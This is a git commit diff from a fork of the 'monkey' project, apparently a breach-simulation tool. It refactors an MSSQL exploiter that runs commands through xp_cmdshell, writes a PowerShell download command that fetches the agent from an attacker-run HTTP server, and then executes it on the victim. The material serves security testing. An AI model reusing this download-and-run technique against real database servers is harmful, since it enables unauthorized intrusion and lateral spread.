forked from p15670423/monkey
Agent: Remove create_empty_payload_file() in MSSQLExploiter
Since the commands are no longer split up into 128 character chunks, it's simpler to just overwrite an existing file using `>` than to create an empty file and append to it.
This commit is contained in:
parent
ea980c4594
commit
7846a6cac1
|
@ -37,8 +37,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
XP_CMDSHELL_COMMAND_START = "xp_cmdshell '"
|
||||
XP_CMDSHELL_COMMAND_END = "'"
|
||||
EXPLOIT_COMMAND_PREFIX = "<nul set /p="
|
||||
EXPLOIT_COMMAND_SUFFIX = ">>{payload_file_path}"
|
||||
CREATE_COMMAND_SUFFIX = ">{payload_file_path}"
|
||||
EXPLOIT_COMMAND_SUFFIX = ">{payload_file_path}"
|
||||
MONKEY_DOWNLOAD_COMMAND = (
|
||||
"powershell (new-object System.Net.WebClient)."
|
||||
"DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
|
||||
|
@ -79,15 +78,11 @@ class MSSQLExploiter(HostExploiter):
|
|||
try:
|
||||
# Create dir for payload
|
||||
self.create_temp_dir()
|
||||
self.create_empty_payload_file()
|
||||
|
||||
http_thread = self.start_monkey_server(monkey_path_on_victim)
|
||||
self.upload_monkey(monkey_path_on_victim)
|
||||
MSSQLExploiter._stop_monkey_server(http_thread)
|
||||
|
||||
# Clear payload to pass in another command
|
||||
self.create_empty_payload_file()
|
||||
|
||||
self.run_monkey(monkey_path_on_victim)
|
||||
|
||||
self.remove_temp_dir()
|
||||
|
@ -116,14 +111,6 @@ class MSSQLExploiter(HostExploiter):
|
|||
)
|
||||
self.run_mssql_command(dir_creation_command)
|
||||
|
||||
def create_empty_payload_file(self):
|
||||
logger.debug(f"Creating an empty payload file: {self.payload_file_path}")
|
||||
suffix = MSSQLExploiter.CREATE_COMMAND_SUFFIX.format(
|
||||
payload_file_path=self.payload_file_path
|
||||
)
|
||||
tmp_file_creation_command = MSSQLLimitedSizePayload(command="NUL", suffix=suffix)
|
||||
self.run_mssql_command(tmp_file_creation_command)
|
||||
|
||||
def run_mssql_command(self, mssql_command):
|
||||
array_of_commands = mssql_command.split_into_array_of_smaller_payloads()
|
||||
if not array_of_commands:
|
||||
|
@ -182,7 +169,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
monkey_args = build_monkey_commandline(
|
||||
self.host, self.current_depth - 1, monkey_path_on_victim
|
||||
)
|
||||
suffix = ">>{}".format(self.payload_file_path)
|
||||
suffix = ">{}".format(self.payload_file_path)
|
||||
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
|
||||
return MSSQLLimitedSizePayload(
|
||||
command="{} {} {}".format(monkey_path_on_victim, DROPPER_ARG, monkey_args),
|
||||
|
|
Loading…
Reference in New Issue